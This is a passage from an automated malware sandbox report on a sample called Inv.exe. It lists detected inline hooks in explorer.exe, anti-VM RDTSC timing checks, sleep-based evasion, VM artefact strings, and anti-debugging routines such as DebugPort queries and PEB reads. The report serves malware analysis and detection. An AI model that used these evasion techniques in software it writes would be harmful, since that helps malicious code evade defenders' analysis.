Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E6D0D1 push ecx; ret 4_2_02E6D0E4
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_0036D085 push eax; ret 4_2_0036D0D8
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_0036D0D2 push eax; ret 4_2_0036D0D8
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_0036D0DB push eax; ret 4_2_0036D142
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_0036D13C push eax; ret 4_2_0036D142
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_0036D1EF push ebp; ret 4_2_0036D6FD
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_0036DA9F push cs; iretd 4_2_0036DAAE
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_0035F345 push edi; retf 4_2_0035F34C
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_0036E7C6 push edx; ret 4_2_0036E83E

Hooking and other Techniques for Hiding and Protection:

barindex
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x85 0x5E 0xE3
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\Inv.exe RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Inv.exe RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\NETSTAT.EXE RDTSC instruction interceptor: First address: 00000000003598E4 second address: 00000000003598EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\NETSTAT.EXE RDTSC instruction interceptor: First address: 0000000000359B5E second address: 0000000000359B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_00409A90 rdtsc 1_2_00409A90
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\explorer.exe TID: 6700 Thread sleep count: 65 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 6700 Thread sleep time: -130000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 6576 Thread sleep count: 43 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 6576 Thread sleep time: -86000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\NETSTAT.EXE Last function: Thread delayed
Source: C:\Windows\SysWOW64\NETSTAT.EXE Last function: Thread delayed
Source: explorer.exe, 00000002.00000000.690270641.000000000A60E000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000002.1062140543.00000000058C0000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000002.00000000.686106576.0000000006650000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000000.690270641.000000000A60E000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000002.1056063670.0000000004710000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
Source: explorer.exe, 00000002.00000000.690752068.000000000A716000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
Source: explorer.exe, 00000002.00000002.1062140543.00000000058C0000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000002.00000002.1062140543.00000000058C0000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000002.00000000.690969786.000000000A784000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
Source: explorer.exe, 00000002.00000002.1062140543.00000000058C0000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Users\user\Desktop\Inv.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\Inv.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_00409A90 rdtsc 1_2_00409A90
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0040ACD0 LdrLoadDll, 1_2_0040ACD0
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\Inv.exe Code function: 0_2_01241B13 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 0_2_01241B13
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Source: C:\Users\user\Desktop\Inv.exe Code function: 0_2_01241B13 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 0_2_01241B13
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\Inv.exe Code function: 0_2_01241B13 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 0_2_01241B13
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\Inv.exe Code function: 0_2_01236A00 mov eax, dword ptr fs:[00000030h] 0_2_01236A00
Source: C:\Users\user\Desktop\Inv.exe Code function: 0_2_0073E912 mov eax, dword ptr fs:[00000030h] 0_2_0073E912
Source: C:\Users\user\Desktop\Inv.exe Code function: 0_2_0073F1BE mov eax, dword ptr fs:[00000030h] 0_2_0073F1BE
Source: C:\Users\user\Desktop\Inv.exe Code function: 0_2_0073F181 mov eax, dword ptr fs:[00000030h] 0_2_0073F181
Source: C:\Users\user\Desktop\Inv.exe Code function: 0_2_0073F221 mov eax, dword ptr fs:[00000030h] 0_2_0073F221
Source: C:\Users\user\Desktop\Inv.exe Code function: 0_2_0073F369 mov eax, dword ptr fs:[00000030h] 0_2_0073F369
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01236A00 mov eax, dword ptr fs:[00000030h] 1_2_01236A00
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01972990 mov eax, dword ptr fs:[00000030h] 1_2_01972990
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0197A185 mov eax, dword ptr fs:[00000030h] 1_2_0197A185
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0196C182 mov eax, dword ptr fs:[00000030h] 1_2_0196C182
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019C51BE mov eax, dword ptr fs:[00000030h] 1_2_019C51BE
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019C51BE mov eax, dword ptr fs:[00000030h] 1_2_019C51BE
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019C51BE mov eax, dword ptr fs:[00000030h] 1_2_019C51BE
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019C51BE mov eax, dword ptr fs:[00000030h] 1_2_019C51BE
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019761A0 mov eax, dword ptr fs:[00000030h] 1_2_019761A0
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019761A0 mov eax, dword ptr fs:[00000030h] 1_2_019761A0
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019C69A6 mov eax, dword ptr fs:[00000030h] 1_2_019C69A6
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0194B1E1 mov eax, dword ptr fs:[00000030h] 1_2_0194B1E1
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0194B1E1 mov eax, dword ptr fs:[00000030h] 1_2_0194B1E1
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0194B1E1 mov eax, dword ptr fs:[00000030h] 1_2_0194B1E1
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019D41E8 mov eax, dword ptr fs:[00000030h] 1_2_019D41E8
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01949100 mov eax, dword ptr fs:[00000030h] 1_2_01949100
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01949100 mov eax, dword ptr fs:[00000030h] 1_2_01949100
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01949100 mov eax, dword ptr fs:[00000030h] 1_2_01949100
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0197513A mov eax, dword ptr fs:[00000030h] 1_2_0197513A
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0197513A mov eax, dword ptr fs:[00000030h] 1_2_0197513A
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01964120 mov eax, dword ptr fs:[00000030h] 1_2_01964120
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01964120 mov eax, dword ptr fs:[00000030h] 1_2_01964120
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01964120 mov eax, dword ptr fs:[00000030h] 1_2_01964120
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01964120 mov eax, dword ptr fs:[00000030h] 1_2_01964120
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01964120 mov ecx, dword ptr fs:[00000030h] 1_2_01964120
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0196B944 mov eax, dword ptr fs:[00000030h] 1_2_0196B944
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0196B944 mov eax, dword ptr fs:[00000030h] 1_2_0196B944
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0194B171 mov eax, dword ptr fs:[00000030h] 1_2_0194B171
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0194B171 mov eax, dword ptr fs:[00000030h] 1_2_0194B171
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0194C962 mov eax, dword ptr fs:[00000030h] 1_2_0194C962
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01949080 mov eax, dword ptr fs:[00000030h] 1_2_01949080
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019C3884 mov eax, dword ptr fs:[00000030h] 1_2_019C3884
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019C3884 mov eax, dword ptr fs:[00000030h] 1_2_019C3884
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0197F0BF mov ecx, dword ptr fs:[00000030h] 1_2_0197F0BF
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0197F0BF mov eax, dword ptr fs:[00000030h] 1_2_0197F0BF
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0197F0BF mov eax, dword ptr fs:[00000030h] 1_2_0197F0BF
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019890AF mov eax, dword ptr fs:[00000030h] 1_2_019890AF
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019720A0 mov eax, dword ptr fs:[00000030h] 1_2_019720A0
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019720A0 mov eax, dword ptr fs:[00000030h] 1_2_019720A0
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019720A0 mov eax, dword ptr fs:[00000030h] 1_2_019720A0
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019720A0 mov eax, dword ptr fs:[00000030h] 1_2_019720A0
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019720A0 mov eax, dword ptr fs:[00000030h] 1_2_019720A0
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019720A0 mov eax, dword ptr fs:[00000030h] 1_2_019720A0
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019DB8D0 mov eax, dword ptr fs:[00000030h] 1_2_019DB8D0
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019DB8D0 mov ecx, dword ptr fs:[00000030h] 1_2_019DB8D0
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019DB8D0 mov eax, dword ptr fs:[00000030h] 1_2_019DB8D0
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019DB8D0 mov eax, dword ptr fs:[00000030h] 1_2_019DB8D0
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019DB8D0 mov eax, dword ptr fs:[00000030h] 1_2_019DB8D0
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019DB8D0 mov eax, dword ptr fs:[00000030h] 1_2_019DB8D0
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019458EC mov eax, dword ptr fs:[00000030h] 1_2_019458EC
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019C7016 mov eax, dword ptr fs:[00000030h] 1_2_019C7016
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019C7016 mov eax, dword ptr fs:[00000030h] 1_2_019C7016
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019C7016 mov eax, dword ptr fs:[00000030h] 1_2_019C7016
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01A14015 mov eax, dword ptr fs:[00000030h] 1_2_01A14015
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01A14015 mov eax, dword ptr fs:[00000030h] 1_2_01A14015
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0197002D mov eax, dword ptr fs:[00000030h] 1_2_0197002D
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0197002D mov eax, dword ptr fs:[00000030h] 1_2_0197002D
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0197002D mov eax, dword ptr fs:[00000030h] 1_2_0197002D
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0197002D mov eax, dword ptr fs:[00000030h] 1_2_0197002D
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0197002D mov eax, dword ptr fs:[00000030h] 1_2_0197002D
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0195B02A mov eax, dword ptr fs:[00000030h] 1_2_0195B02A
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0195B02A mov eax, dword ptr fs:[00000030h] 1_2_0195B02A
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0195B02A mov eax, dword ptr fs:[00000030h] 1_2_0195B02A
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0195B02A mov eax, dword ptr fs:[00000030h] 1_2_0195B02A
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01960050 mov eax, dword ptr fs:[00000030h] 1_2_01960050
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01960050 mov eax, dword ptr fs:[00000030h] 1_2_01960050
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01A02073 mov eax, dword ptr fs:[00000030h] 1_2_01A02073
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01A11074 mov eax, dword ptr fs:[00000030h] 1_2_01A11074
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01972397 mov eax, dword ptr fs:[00000030h] 1_2_01972397
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01A15BA5 mov eax, dword ptr fs:[00000030h] 1_2_01A15BA5
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0197B390 mov eax, dword ptr fs:[00000030h] 1_2_0197B390
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01951B8F mov eax, dword ptr fs:[00000030h] 1_2_01951B8F
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01951B8F mov eax, dword ptr fs:[00000030h] 1_2_01951B8F
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019FD380 mov ecx, dword ptr fs:[00000030h] 1_2_019FD380
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01A0138A mov eax, dword ptr fs:[00000030h] 1_2_01A0138A
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01974BAD mov eax, dword ptr fs:[00000030h] 1_2_01974BAD
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01974BAD mov eax, dword ptr fs:[00000030h] 1_2_01974BAD
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01974BAD mov eax, dword ptr fs:[00000030h] 1_2_01974BAD
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019C53CA mov eax, dword ptr fs:[00000030h] 1_2_019C53CA
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019C53CA mov eax, dword ptr fs:[00000030h] 1_2_019C53CA
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019703E2 mov eax, dword ptr fs:[00000030h] 1_2_019703E2
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019703E2 mov eax, dword ptr fs:[00000030h] 1_2_019703E2
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019703E2 mov eax, dword ptr fs:[00000030h] 1_2_019703E2
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019703E2 mov eax, dword ptr fs:[00000030h] 1_2_019703E2
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019703E2 mov eax, dword ptr fs:[00000030h] 1_2_019703E2
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019703E2 mov eax, dword ptr fs:[00000030h] 1_2_019703E2
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0196DBE9 mov eax, dword ptr fs:[00000030h] 1_2_0196DBE9
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01A0131B mov eax, dword ptr fs:[00000030h] 1_2_01A0131B
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0194F358 mov eax, dword ptr fs:[00000030h] 1_2_0194F358
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0194DB40 mov eax, dword ptr fs:[00000030h] 1_2_0194DB40
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01973B7A mov eax, dword ptr fs:[00000030h] 1_2_01973B7A
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01973B7A mov eax, dword ptr fs:[00000030h] 1_2_01973B7A
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0194DB60 mov ecx, dword ptr fs:[00000030h] 1_2_0194DB60
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01A18B58 mov eax, dword ptr fs:[00000030h] 1_2_01A18B58
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0197D294 mov eax, dword ptr fs:[00000030h] 1_2_0197D294
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0197D294 mov eax, dword ptr fs:[00000030h] 1_2_0197D294
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0195AAB0 mov eax, dword ptr fs:[00000030h] 1_2_0195AAB0
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0195AAB0 mov eax, dword ptr fs:[00000030h] 1_2_0195AAB0
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0197FAB0 mov eax, dword ptr fs:[00000030h] 1_2_0197FAB0
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019452A5 mov eax, dword ptr fs:[00000030h] 1_2_019452A5
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019452A5 mov eax, dword ptr fs:[00000030h] 1_2_019452A5
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019452A5 mov eax, dword ptr fs:[00000030h] 1_2_019452A5
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019452A5 mov eax, dword ptr fs:[00000030h] 1_2_019452A5
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019452A5 mov eax, dword ptr fs:[00000030h] 1_2_019452A5
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01972ACB mov eax, dword ptr fs:[00000030h] 1_2_01972ACB
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01972AE4 mov eax, dword ptr fs:[00000030h] 1_2_01972AE4
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0194AA16 mov eax, dword ptr fs:[00000030h] 1_2_0194AA16
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0194AA16 mov eax, dword ptr fs:[00000030h] 1_2_0194AA16
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01945210 mov eax, dword ptr fs:[00000030h] 1_2_01945210
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01945210 mov ecx, dword ptr fs:[00000030h] 1_2_01945210
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01945210 mov eax, dword ptr fs:[00000030h] 1_2_01945210
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01945210 mov eax, dword ptr fs:[00000030h] 1_2_01945210
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01963A1C mov eax, dword ptr fs:[00000030h] 1_2_01963A1C
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01958A0A mov eax, dword ptr fs:[00000030h] 1_2_01958A0A
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01984A2C mov eax, dword ptr fs:[00000030h] 1_2_01984A2C
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01984A2C mov eax, dword ptr fs:[00000030h] 1_2_01984A2C
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01A18A62 mov eax, dword ptr fs:[00000030h] 1_2_01A18A62
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019D4257 mov eax, dword ptr fs:[00000030h] 1_2_019D4257
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01949240 mov eax, dword ptr fs:[00000030h] 1_2_01949240
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01949240 mov eax, dword ptr fs:[00000030h] 1_2_01949240
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01949240 mov eax, dword ptr fs:[00000030h] 1_2_01949240
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01949240 mov eax, dword ptr fs:[00000030h] 1_2_01949240
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0198927A mov eax, dword ptr fs:[00000030h] 1_2_0198927A
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01A0EA55 mov eax, dword ptr fs:[00000030h] 1_2_01A0EA55
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019FB260 mov eax, dword ptr fs:[00000030h] 1_2_019FB260
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019FB260 mov eax, dword ptr fs:[00000030h] 1_2_019FB260
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0197FD9B mov eax, dword ptr fs:[00000030h] 1_2_0197FD9B
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0197FD9B mov eax, dword ptr fs:[00000030h] 1_2_0197FD9B
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01A105AC mov eax, dword ptr fs:[00000030h] 1_2_01A105AC
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01A105AC mov eax, dword ptr fs:[00000030h] 1_2_01A105AC
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01972581 mov eax, dword ptr fs:[00000030h] 1_2_01972581
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01972581 mov eax, dword ptr fs:[00000030h] 1_2_01972581
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01972581 mov eax, dword ptr fs:[00000030h] 1_2_01972581
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01972581 mov eax, dword ptr fs:[00000030h] 1_2_01972581
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01942D8A mov eax, dword ptr fs:[00000030h] 1_2_01942D8A
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01942D8A mov eax, dword ptr fs:[00000030h] 1_2_01942D8A
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01942D8A mov eax, dword ptr fs:[00000030h] 1_2_01942D8A
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01942D8A mov eax, dword ptr fs:[00000030h] 1_2_01942D8A
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01942D8A mov eax, dword ptr fs:[00000030h] 1_2_01942D8A
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01971DB5 mov eax, dword ptr fs:[00000030h] 1_2_01971DB5
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01971DB5 mov eax, dword ptr fs:[00000030h] 1_2_01971DB5
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01971DB5 mov eax, dword ptr fs:[00000030h] 1_2_01971DB5
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019735A1 mov eax, dword ptr fs:[00000030h] 1_2_019735A1
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01A0FDE2 mov eax, dword ptr fs:[00000030h] 1_2_01A0FDE2
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01A0FDE2 mov eax, dword ptr fs:[00000030h] 1_2_01A0FDE2
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01A0FDE2 mov eax, dword ptr fs:[00000030h] 1_2_01A0FDE2
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01A0FDE2 mov eax, dword ptr fs:[00000030h] 1_2_01A0FDE2
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019C6DC9 mov eax, dword ptr fs:[00000030h] 1_2_019C6DC9
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019C6DC9 mov eax, dword ptr fs:[00000030h] 1_2_019C6DC9
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019C6DC9 mov eax, dword ptr fs:[00000030h] 1_2_019C6DC9
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019C6DC9 mov ecx, dword ptr fs:[00000030h] 1_2_019C6DC9
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019C6DC9 mov eax, dword ptr fs:[00000030h] 1_2_019C6DC9
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019C6DC9 mov eax, dword ptr fs:[00000030h] 1_2_019C6DC9
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019F8DF1 mov eax, dword ptr fs:[00000030h] 1_2_019F8DF1
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0195D5E0 mov eax, dword ptr fs:[00000030h] 1_2_0195D5E0
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0195D5E0 mov eax, dword ptr fs:[00000030h] 1_2_0195D5E0
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01A18D34 mov eax, dword ptr fs:[00000030h] 1_2_01A18D34
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01A0E539 mov eax, dword ptr fs:[00000030h] 1_2_01A0E539
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01953D34 mov eax, dword ptr fs:[00000030h] 1_2_01953D34
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01953D34 mov eax, dword ptr fs:[00000030h] 1_2_01953D34
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01953D34 mov eax, dword ptr fs:[00000030h] 1_2_01953D34
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01953D34 mov eax, dword ptr fs:[00000030h] 1_2_01953D34
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01953D34 mov eax, dword ptr fs:[00000030h] 1_2_01953D34
